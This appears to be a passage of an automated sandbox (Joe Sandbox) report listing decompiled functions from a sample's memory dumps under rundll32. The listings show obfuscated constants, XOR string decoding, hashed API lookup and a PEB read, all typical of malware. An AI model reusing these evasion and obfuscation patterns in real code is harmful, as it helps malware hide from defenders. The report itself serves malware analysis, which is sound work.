Instruction Fuzzy Hash: 5D8125B1C00219EBDF18CFE5D88A9EEBBB1FF14314F208119E522B62A0D7B94A55CF55

Uniqueness

Uniqueness Score: -1.00%

Function 001B41AD, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E001B41AD(void* __edx, void* __eflags) {
				void* _t169;
				void* _t183;
				signed int _t187;
				signed int _t188;
				intOrPtr _t203;
				intOrPtr _t206;
				void* _t209;
				void* _t210;

				_t209 = _t210 - 0x58;
				_push( *((intOrPtr*)(_t209 + 0x7c)));
				_t203 =  *((intOrPtr*)(_t209 + 0x74));
				_push( *((intOrPtr*)(_t209 + 0x78)));
				_push(_t203);
				_push( *((intOrPtr*)(_t209 + 0x70)));
				_push( *((intOrPtr*)(_t209 + 0x6c)));
				_push( *((intOrPtr*)(_t209 + 0x68)));
				_push( *((intOrPtr*)(_t209 + 0x64)));
				_push( *((intOrPtr*)(_t209 + 0x60)));
				_push(__edx);
				_push(0);
				E001AD571(_t169);
				 *(_t209 + 0xc) =  *(_t209 + 0xc) & 0x00000000;
				 *((intOrPtr*)(_t209 + 4)) = 0x2a14a3;
				 *((intOrPtr*)(_t209 + 8)) = 0x424fb2;
				 *(_t209 + 0x10) = 0x85df;
				 *(_t209 + 0x10) =  *(_t209 + 0x10) + 0xbd54;
				 *(_t209 + 0x10) =  *(_t209 + 0x10) ^ 0x0001069e;
				 *(_t209 + 0x44) = 0xf66e;
				 *(_t209 + 0x44) =  *(_t209 + 0x44) | 0xcf2fe6de;
				 *(_t209 + 0x44) =  *(_t209 + 0x44) << 0x10;
				 *(_t209 + 0x44) =  *(_t209 + 0x44) ^ 0xf6fe6db5;
				 *(_t209 + 0x4c) = 0xb9d3;
				_t187 = 0x5c;
				 *(_t209 + 0x4c) =  *(_t209 + 0x4c) * 0x52;
				 *(_t209 + 0x4c) =  *(_t209 + 0x4c) | 0xd92cbe36;
				 *(_t209 + 0x4c) =  *(_t209 + 0x4c) + 0xf2c1;
				 *(_t209 + 0x4c) =  *(_t209 + 0x4c) ^ 0xd940e3ca;
				 *(_t209 + 0x2c) = 0xb180;
				 *(_t209 + 0x2c) =  *(_t209 + 0x2c) << 0xf;
				 *(_t209 + 0x2c) =  *(_t209 + 0x2c) ^ 0x58c064f7;
				 *(_t209 + 0x18) = 0x5c95;
				 *(_t209 + 0x18) =  *(_t209 + 0x18) + 0xffffee37;
				 *(_t209 + 0x18) =  *(_t209 + 0x18) ^ 0x00000875;
				 *(_t209 + 0x34) = 0xfb6e;
				 *(_t209 + 0x34) =  *(_t209 + 0x34) | 0x6a88fc3f;
				 *(_t209 + 0x34) =  *(_t209 + 0x34) + 0xdefe;
				 *(_t209 + 0x34) =  *(_t209 + 0x34) ^ 0x6a89a390;
				 *(_t209 + 0x14) = 0x3097;
				 *(_t209 + 0x14) =  *(_t209 + 0x14) / _t187;
				 *(_t209 + 0x14) =  *(_t209 + 0x14) ^ 0x00006c9d;
				 *(_t209 + 0x20) = 0xae6e;
				 *(_t209 + 0x20) =  *(_t209 + 0x20) | 0x83ed0308;
				 *(_t209 + 0x20) =  *(_t209 + 0x20) ^ 0x83ed961e;
				 *(_t209 + 0x54) = 0xb611;
				 *(_t209 + 0x54) =  *(_t209 + 0x54) ^ 0xe19b12be;
				 *(_t209 + 0x54) =  *(_t209 + 0x54) ^ 0x64a716fe;
				 *(_t209 + 0x54) =  *(_t209 + 0x54) | 0x404434be;
				 *(_t209 + 0x54) =  *(_t209 + 0x54) ^ 0xc57ca194;
				 *(_t209 + 0x3c) = 0xa831;
				 *(_t209 + 0x3c) =  *(_t209 + 0x3c) ^ 0x88a1b475;
				 *(_t209 + 0x3c) =  *(_t209 + 0x3c) | 0x5f877e13;
				 *(_t209 + 0x3c) =  *(_t209 + 0x3c) ^ 0xdfa722d7;
				 *(_t209 + 0x38) = 0x80de;
				 *(_t209 + 0x38) =  *(_t209 + 0x38) + 0x9624;
				 *(_t209 + 0x38) =  *(_t209 + 0x38) + 0xffff5876;
				 *(_t209 + 0x38) =  *(_t209 + 0x38) ^ 0x000063a6;
				 *(_t209 + 0x40) = 0x8b06;
				 *(_t209 + 0x40) =  *(_t209 + 0x40) | 0x52320dbf;
				 *(_t209 + 0x40) =  *(_t209 + 0x40) + 0x274;
				 *(_t209 + 0x40) =  *(_t209 + 0x40) ^ 0x5232a3fd;
				 *(_t209 + 0x28) = 0x4700;
				 *(_t209 + 0x28) =  *(_t209 + 0x28) + 0xc3f6;
				 *(_t209 + 0x28) =  *(_t209 + 0x28) ^ 0x000140d0;
				 *(_t209 + 0x50) = 0x4baa;
				_t188 = 0x18;
				 *(_t209 + 0x50) =  *(_t209 + 0x50) / _t188;
				 *(_t209 + 0x50) =  *(_t209 + 0x50) >> 0xd;
				 *(_t209 + 0x50) =  *(_t209 + 0x50) + 0xffff18f4;
				 *(_t209 + 0x50) =  *(_t209 + 0x50) ^ 0xffff49f9;
				 *(_t209 + 0x1c) = 0x2f8;
				 *(_t209 + 0x1c) =  *(_t209 + 0x1c) + 0xf5bb;
				 *(_t209 + 0x1c) =  *(_t209 + 0x1c) ^ 0x0000a6a2;
				 *(_t209 + 0x24) = 0x3302;
				 *(_t209 + 0x24) =  *(_t209 + 0x24) << 0xa;
				 *(_t209 + 0x24) =  *(_t209 + 0x24) ^ 0x00cc7b83;
				 *(_t209 + 0x48) = 0xf27b;
				 *(_t209 + 0x48) =  *(_t209 + 0x48) * 0x23;
				 *(_t209 + 0x48) =  *(_t209 + 0x48) << 0xf;
				 *(_t209 + 0x48) =  *(_t209 + 0x48) ^ 0x7a7c1591;
				 *(_t209 + 0x48) =  *(_t209 + 0x48) ^ 0xe914bc4c;
				 *(_t209 + 0x30) = 0x88b0;
				 *(_t209 + 0x30) =  *(_t209 + 0x30) * 0x2c;
				 *(_t209 + 0x30) =  *(_t209 + 0x30) | 0xc324f320;
				 *(_t209 + 0x30) =  *(_t209 + 0x30) ^ 0xc337c250;
				_push( *(_t209 + 0x2c));
				_push( *(_t209 + 0x4c));
				_push(_t209 - 0x50);
				_push( *(_t209 + 0x44));
				_t206 = 0x44;
				_t189 = _t206;
				E001A554B(_t206,  *(_t209 + 0x10));
				 *((intOrPtr*)(_t209 - 0x50)) = _t206;
				if(E001B7565( *((intOrPtr*)(_t209 + 0x64)),  *((intOrPtr*)(_t209 + 0x6c)),  *(_t209 + 0x18), _t209 - 0x50, _t206, _t189,  *((intOrPtr*)(_t209 + 0x60)),  *(_t209 + 0x34),  *(_t209 + 0x14), _t189,  *(_t209 + 0x20), _t189, _t209 - 0xc,  *(_t209 + 0x54), _t189,  *(_t209 + 0x3c)) == 0) {
					_t183 = 0;
				} else {
					if(_t203 == 0) {
						E001B01E5( *(_t209 + 0x38),  *(_t209 + 0x28),  *((intOrPtr*)(_t209 - 0xc)),  *(_t209 + 0x50));
						E001B01E5( *(_t209 + 0x1c),  *(_t209 + 0x48),  *((intOrPtr*)(_t209 - 8)),  *(_t209 + 0x30));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t183 = 1;
				}
				return _t183;
			}

0x001b41ae
0x001b41ba
0x001b41bd
0x001b41c0
0x001b41c3
0x001b41c4
0x001b41c7
0x001b41ca
0x001b41cd
0x001b41d0
0x001b41d3
0x001b41d4
0x001b41d6
0x001b41db
0x001b41e1
0x001b41e8
0x001b41ef
0x001b41f6
0x001b41fd
0x001b4204
0x001b420b
0x001b4212
0x001b4216
0x001b421d
0x001b422a
0x001b422d
0x001b4230
0x001b4237
0x001b423e
0x001b4245
0x001b424c
0x001b4250
0x001b4257
0x001b425e
0x001b4265
0x001b426c
0x001b4273
0x001b427a
0x001b4281
0x001b4288
0x001b4296
0x001b4299
0x001b42a0
0x001b42a7
0x001b42ae
0x001b42b5
0x001b42bc
0x001b42c3
0x001b42ca
0x001b42d1
0x001b42d8
0x001b42df
0x001b42e6
0x001b42ed
0x001b42f4
0x001b42fb
0x001b4302
0x001b4309
0x001b4310
0x001b4317
0x001b431e
0x001b4325
0x001b432c
0x001b4333
0x001b433a
0x001b4341
0x001b434b
0x001b434e
0x001b4351
0x001b4355
0x001b435c
0x001b4363
0x001b436a
0x001b4371
0x001b4378
0x001b437f
0x001b4383
0x001b438a
0x001b4395
0x001b4398
0x001b439c
0x001b43a3
0x001b43aa
0x001b43b5
0x001b43bb
0x001b43c2
0x001b43c9
0x001b43cc
0x001b43cf
0x001b43d0
0x001b43d8
0x001b43d9
0x001b43db
0x001b43e9
0x001b4418
0x001b4457
0x001b441a
0x001b441c
0x001b4439
0x001b444d
0x001b441e
0x001b4421
0x001b4422
0x001b4423
0x001b4424
0x001b4424
0x001b4427
0x001b4427
0x001b445f

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a642c7f1c7e514bc3cd9b21924c5ded49d83665513775fc9b1c7a92fff5cde06
Instruction ID: 8583d5d82eb468cf8c162b01d777e707a6a9e56e25b0e26d91438a4047f59e41
Opcode Fuzzy Hash: a642c7f1c7e514bc3cd9b21924c5ded49d83665513775fc9b1c7a92fff5cde06
Instruction Fuzzy Hash: 2C81E071410248ABDF59CFA4D94A9DE3FA1FF54358F008218FE16961A0D7BAC9A9DF80

Uniqueness

Uniqueness Score: -1.00%

Function 001B2B45, Relevance: .1, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E001B2B45(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v116;
				void* _t83;
				void* _t91;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t98;
				intOrPtr _t100;
				signed int _t105;
				intOrPtr _t125;
				void* _t126;
				void* _t128;
				void* _t129;
				void* _t130;

				_t130 = __eflags;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t83);
				_v56 = 0x14fd44;
				_t125 = 0;
				_v52 = 0;
				_v32 = 0x73bb;
				_v32 = _v32 | 0x2e4357ca;
				_v32 = _v32 ^ 0x2e431d3d;
				_v28 = 0x8013;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x00001744;
				_v24 = 0xdb9d;
				_t105 = 0x6e;
				_v24 = _v24 * 0x11;
				_v24 = _v24 ^ 0x000ee762;
				_v20 = 0x82bf;
				_v20 = _v20 ^ 0x9c9d9e3a;
				_v20 = _v20 ^ 0x9c9d2bfa;
				_v40 = 0x21b3;
				_v40 = _v40 << 4;
				_v40 = _v40 ^ 0x000207cf;
				_v36 = 0x4e22;
				_v36 = _v36 * 0x32;
				_v36 = _v36 ^ 0x000f7b9f;
				_v16 = 0x77f8;
				_v16 = _v16 + 0xffff4140;
				_v16 = _v16 / _t105;
				_v16 = _v16 ^ 0x0253fa5e;
				_v12 = 0xd22;
				_v12 = _v12 + 0xf920;
				_v12 = _v12 + 0xffff02e6;
				_v12 = _v12 + 0x2a23;
				_v12 = _v12 ^ 0x000036e8;
				E001BC395(_v32,  &_v116, _a12, _v28);
				_t91 = E001A2945( &_v116, _v24, _t130, _v20,  &_v48);
				_t128 = _t126 + 0x24;
				while(_t91 != 0) {
					_t93 = E001A2F97( &_v48, _v40, _v36, _v16,  &_v72, _v12);
					_t129 = _t128 + 0x10;
					__eflags = _t93;
					if(__eflags != 0) {
						_t96 = _v68 - 1;
						__eflags = _t96;
						if(_t96 == 0) {
							E001AC44B(_v72,  &_v64);
						} else {
							_t98 = _t96 - 1;
							__eflags = _t98;
							if(_t98 == 0) {
								E001B1E7D(_v72,  &_v64);
							} else {
								_t100 = _t98 - 1;
								__eflags = _t100;
								if(_t100 == 0) {
									E001A5742(_v72,  &_v64);
								} else {
									__eflags = _t100 == 1;
									if(_t100 == 1) {
										0x1a0a00();
									}
								}
							}
						}
						_t125 = _t125 + 1;
						__eflags = _t125;
					}
					_t91 = E001A2945( &_v116, _v24, __eflags, _v20,  &_v48);
					_t128 = _t129 + 8;
				}
				return _t125;
			}

0x001b2b45
0x001b2b4c
0x001b2b4f
0x001b2b52
0x001b2b55
0x001b2b56
0x001b2b57
0x001b2b5c
0x001b2b63
0x001b2b65
0x001b2b6b
0x001b2b74
0x001b2b7b
0x001b2b82
0x001b2b89
0x001b2b8d
0x001b2b94
0x001b2ba1
0x001b2ba2
0x001b2ba5
0x001b2bac
0x001b2bb3
0x001b2bba
0x001b2bc1
0x001b2bc8
0x001b2bcc
0x001b2bd3
0x001b2bde
0x001b2be1
0x001b2be8
0x001b2bef
0x001b2bfe
0x001b2c01
0x001b2c08
0x001b2c0f
0x001b2c16
0x001b2c1d
0x001b2c24
0x001b2c34
0x001b2c46
0x001b2c4b
0x001b2cc6
0x001b2c63
0x001b2c68
0x001b2c6b
0x001b2c6d
0x001b2c72
0x001b2c72
0x001b2c73
0x001b2cab
0x001b2c75
0x001b2c75
0x001b2c75
0x001b2c76
0x001b2c9e
0x001b2c78
0x001b2c78
0x001b2c78
0x001b2c79
0x001b2c91
0x001b2c7b
0x001b2c7b
0x001b2c7c
0x001b2c84
0x001b2c84
0x001b2c7c
0x001b2c79
0x001b2c76
0x001b2cb0
0x001b2cb0
0x001b2cb0
0x001b2cbe
0x001b2cc3
0x001b2cc3
0x001b2cd0

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f3acfb22c77a3957399bdfe7eea1d0898550b575a95f5bec577a4f4b76a2531
Instruction ID: bb0488d2973f10625a5b67ed949397a7043e9ae6e2d33ce4afd36d89d436f6a8
Opcode Fuzzy Hash: 8f3acfb22c77a3957399bdfe7eea1d0898550b575a95f5bec577a4f4b76a2531
Instruction Fuzzy Hash: 22411375D0020EABDF44DFE4C9858EEBBB1FF14304F208159E515B6261DB795A09CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A27F4, Relevance: .1, Instructions: 100
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E001A27F4(void* __ecx, void* __edx) {
				void* _t57;
				signed int _t63;
				unsigned int* _t77;
				signed int _t78;
				signed int _t80;
				signed int _t81;
				signed int _t85;
				unsigned int _t86;
				unsigned int _t87;
				unsigned int* _t92;
				signed int* _t93;
				signed int* _t94;
				signed int* _t95;
				unsigned int _t97;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t109;

				_t95 =  *(_t107 + 0x34);
				_push(_t95);
				_push( *(_t107 + 0x38));
				E001AD571(_t57);
				 *(_t107 + 0x38) =  *(_t107 + 0x38) & 0x00000000;
				_t93 =  &(_t95[1]);
				 *(_t107 + 0x3c) =  *(_t107 + 0x3c) & 0x00000000;
				 *((intOrPtr*)(_t107 + 0x30)) = 0x12bdd4;
				 *(_t107 + 0x34) = 0x35a9d5;
				 *(_t107 + 0x24) = 0x66dc;
				 *(_t107 + 0x24) =  *(_t107 + 0x24) ^ 0x03226dab;
				 *(_t107 + 0x24) =  *(_t107 + 0x24) ^ 0x03225720;
				 *(_t107 + 0x20) = 0xab63;
				_t80 = 0x3d;
				 *(_t107 + 0x20) =  *(_t107 + 0x20) * 6;
				 *(_t107 + 0x20) =  *(_t107 + 0x20) ^ 0x00047efb;
				 *(_t107 + 0x48) = 0x3efd;
				 *(_t107 + 0x48) =  *(_t107 + 0x48) ^ 0xd26af66b;
				 *(_t107 + 0x48) =  *(_t107 + 0x48) / _t80;
				 *(_t107 + 0x48) =  *(_t107 + 0x48) >> 9;
				 *(_t107 + 0x48) =  *(_t107 + 0x48) ^ 0x0001dfcd;
				 *(_t107 + 0x1c) = 0x340b;
				 *(_t107 + 0x1c) =  *(_t107 + 0x1c) | 0x18f7a97e;
				 *(_t107 + 0x1c) =  *(_t107 + 0x1c) ^ 0x18f7d39f;
				_t81 =  *_t95;
				_t94 =  &(_t93[1]);
				_t63 =  *_t93 ^ _t81;
				 *(_t107 + 0x28) = _t81;
				 *(_t107 + 0x2c) = _t63;
				_t40 = _t63 + 1; // 0xd26af66c
				_t97 =  !=  ? (_t40 & 0xfffffffc) + 4 : _t40;
				_t77 = E001B922B(_t97);
				_t109 = _t107 + 0x14;
				 *(_t109 + 0x38) = _t77;
				if(_t77 != 0) {
					_t105 = 0;
					_t92 = _t77;
					_t103 =  >  ? 0 :  &(_t94[_t97 >> 2]) - _t94 + 3 >> 2;
					if(_t103 != 0) {
						_t78 =  *(_t109 + 0x1c);
						do {
							_t85 =  *_t94;
							_t94 =  &(_t94[1]);
							_t86 = _t85 ^ _t78;
							 *_t92 = _t86;
							_t92 =  &(_t92[1]);
							_t87 = _t86 >> 0x10;
							 *((char*)(_t92 - 3)) = _t86 >> 8;
							 *(_t92 - 2) = _t87;
							_t105 = _t105 + 1;
							 *((char*)(_t92 - 1)) = _t87 >> 8;
						} while (_t105 < _t103);
						_t77 =  *(_t109 + 0x3c);
					}
					 *((char*)(_t77 +  *((intOrPtr*)(_t109 + 0x20)))) = 0;
				}
				return _t77;
			}

0x001a27f9
0x001a27fe
0x001a27ff
0x001a2805
0x001a280a
0x001a280f
0x001a2812
0x001a2819
0x001a2821
0x001a2829
0x001a2831
0x001a2839
0x001a2841
0x001a2850
0x001a2851
0x001a2855
0x001a285d
0x001a2865
0x001a2873
0x001a2877
0x001a287c
0x001a2884
0x001a288c
0x001a2894
0x001a289c
0x001a28a0
0x001a28a3
0x001a28a5
0x001a28a9
0x001a28ad
0x001a28bd
0x001a28d9
0x001a28db
0x001a28de
0x001a28e4
0x001a28ec
0x001a28ee
0x001a28ff
0x001a2904
0x001a2906
0x001a290a
0x001a290a
0x001a290c
0x001a290f
0x001a2911
0x001a2918
0x001a291b
0x001a291e
0x001a2921
0x001a2927
0x001a2928
0x001a292b
0x001a292f
0x001a292f
0x001a2938
0x001a2938
0x001a2944

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc07775d74bc31209219058d4d6cce22500564f3a6e6c9f31b970427b70af6c5
Instruction ID: 84642f4d137c68ca91d2610b74f372b3fa3dd9c9dd48740e76e435ea8b11f31f
Opcode Fuzzy Hash: bc07775d74bc31209219058d4d6cce22500564f3a6e6c9f31b970427b70af6c5
Instruction Fuzzy Hash: C9418A72A083519FC318CF2CC88594BFBE0EF89708F454A2DF98A97250C775D949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 001B1079, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E001B1079(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t55;
				intOrPtr* _t68;
				signed int _t71;
				signed int _t72;
				signed int _t73;
				void* _t83;

				_t83 = __ecx;
				E001AD571(_t55);
				_v32 = 0x744982;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0xbe50;
				_t71 = 0x11;
				_v8 = _v8 / _t71;
				_t72 = 0x14;
				_v8 = _v8 * 0x78;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x00000787;
				_v20 = 0xcaac;
				_t73 = 0x67;
				_v20 = _v20 / _t72;
				_v20 = _v20 ^ 0x000028f7;
				_v12 = 0x7358;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 / _t73;
				_t41 = _t73 + 0x2d; // 0x94
				_v12 = _v12 ^ 0x00005d5e;
				_v16 = 0x963;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00003208;
				_t68 = E001A546F(_t41, 0xbee648b, _t73, _t73, 0x330c21b7);
				return  *_t68(_t83, _a16, 0x60, _a24, 0, 0, __ecx, __edx, _a4, _a8, _a12, _a16, _a20, _a24, 0, 0x60, 0);
			}

0x001b1083
0x001b109d
0x001b10a2
0x001b10ab
0x001b10ae
0x001b10b1
0x001b10bd
0x001b10c2
0x001b10cb
0x001b10ce
0x001b10d1
0x001b10d5
0x001b10dc
0x001b10e8
0x001b10e9
0x001b10ee
0x001b10f8
0x001b10ff
0x001b110d
0x001b1110
0x001b1113
0x001b111a
0x001b1121
0x001b1125
0x001b113f
0x001b1159

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50f9781698d285f6dab6f4a0fb94be0c3101e7b40469caf42caf9b7493b42e6e
Instruction ID: e15eda095e72a43536b74f1014e5ed26dddf1821c67e40357a67b541aa24851f
Opcode Fuzzy Hash: 50f9781698d285f6dab6f4a0fb94be0c3101e7b40469caf42caf9b7493b42e6e
Instruction Fuzzy Hash: 8E211676E0020CFFEB04DF95C84A9DFBBB6EB94704F10808AF914AA250D7B55B21DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000C0D0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e6297b0dce82a2966aeafa3541f73d6445a8d16c85e1994c2877186d2ddf83b9
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 3A112EBB64438A43F680C72DD8B4DEBA3DAEBC72E07294375D1424B65ED122D9559500

Uniqueness

Uniqueness Score: -1.00%

Function 001B7713, Relevance: .1, Instructions: 57
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001B7713() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t76;

				_v32 = _v32 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v40 = 0x49a553;
				_v20 = 0x722a;
				_v20 = _v20 << 3;
				_t76 = 0x41;
				_v20 = _v20 * 0x33;
				_v20 = _v20 ^ 0x00b5fae5;
				_v8 = 0xd86c;
				_v8 = _v8 + 0xffffb7a4;
				_v8 = _v8 >> 1;
				_v8 = _v8 + 0x2819;
				_v8 = _v8 ^ 0x00002d1a;
				_v16 = 0xf4c3;
				_v16 = _v16 ^ 0x451e33d0;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 * 0x30;
				_v16 = _v16 ^ 0x0067b55b;
				_v28 = 0x558;
				_v28 = _v28 / _t76;
				_v28 = _v28 << 0x10;
				_v28 = _v28 ^ 0x00152446;
				_v12 = 0xb049;
				_v12 = _v12 | 0x23203aa3;
				_v12 = _v12 * 0x5f;
				_v12 = _v12 ^ 0xda555cae;
				_v12 = _v12 ^ 0xd37015a4;
				_v24 = 0x436a;
				_v24 = _v24 + 0xf179;
				_v24 = _v24 | 0x8b53c7cf;
				_v24 = _v24 ^ 0x8b539345;
				E001A2E1B(_v16, _v28, _v12, E001B686E(_t76), _v24,  &_v32);
				return _v32;
			}

0x001b7719
0x001b771f
0x001b7723
0x001b772a
0x001b7731
0x001b773b
0x001b773c
0x001b773f
0x001b7746
0x001b774d
0x001b7754
0x001b7757
0x001b775e
0x001b7765
0x001b776c
0x001b7773
0x001b777b
0x001b777e
0x001b7785
0x001b7791
0x001b7794
0x001b7798
0x001b779f
0x001b77a6
0x001b77b1
0x001b77b4
0x001b77bb
0x001b77c2
0x001b77c9
0x001b77d0
0x001b77d7
0x001b77fa
0x001b7808

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f549f491e99f7eabe698410758ac47cc5c37a86684057171c8297d9b4b9aff
Instruction ID: 39109219876c11fae5079d33a1f134e204b956abb013200c2cc45dedc2c7dd51
Opcode Fuzzy Hash: c3f549f491e99f7eabe698410758ac47cc5c37a86684057171c8297d9b4b9aff
Instruction Fuzzy Hash: BF31A071C0120AEBDB48CFA4C68A5EEFBB1FB00304F608199D525B6290D7B85B598F84

Uniqueness

Uniqueness Score: -1.00%

Function 001B6AB2, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001B6AB2() {

				return  *[fs:0x30];
			}

0x001b6ab8

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFAD, Relevance: 18.1, APIs: 12, Instructions: 84
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E1000DFAD(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t27;
				intOrPtr _t39;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10028be8);
				_t25 =  *0x10027ee4; // 0x0
				_t24 = __eax;
				if(_t25 == 0) {
					L4:
					_push(_t14);
					E10008AD3(_t25);
					_t26 =  *0x10027ee0; // 0x0
					 *0x10027ee4 = 0;
					if(_t26 == 0) {
						L8:
						E10008AD3(_t26);
						 *0x10027ee0 = 0;
						E10008AD3( *0x10027edc);
						_t5 = E10008AD3( *0x10027ed8);
						_t27 = _t26 | 0xffffffff;
						 *0x10027edc = 0;
						 *0x10027ed8 = 0;
						if(_t24 != _t27) {
							_t39 =  *0x10028be8; // 0xddd16f1f
							if(_t39 != 0) {
								_t5 = E10008AD3(_t24);
							}
						}
						__imp__EncodePointer(_t27);
						 *0x10028be8 = _t5;
						_t6 =  *0x10027f10; // 0x0
						if(_t6 != 0) {
							E10008AD3(_t6);
							 *0x10027f10 = 0;
						}
						_t7 =  *0x10027f14; // 0x0
						if(_t7 != 0) {
							E10008AD3(_t7);
							 *0x10027f14 = 0;
						}
						_t8 =  *0x1002700c; // 0x10026de8
						asm("lock xadd [eax], esi");
						if(_t27 != 1) {
							L18:
							return _t8;
						} else {
							_t8 =  *0x1002700c; // 0x10026de8
							if(_t8 == 0x10026de8) {
								goto L18;
							}
							_t9 = E10008AD3(_t8);
							 *0x1002700c = 0x10026de8;
							return _t9;
						}
					}
					while( *_t26 != 0) {
						E10008AD3( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x10027ee0; // 0x0
					goto L8;
				}
				while( *_t25 != 0) {
					E10008AD3( *_t25);
					_t25 = _t25 + 4;
					if(_t25 != 0) {
						continue;
					}
					break;
				}
				_t25 =  *0x10027ee4; // 0x0
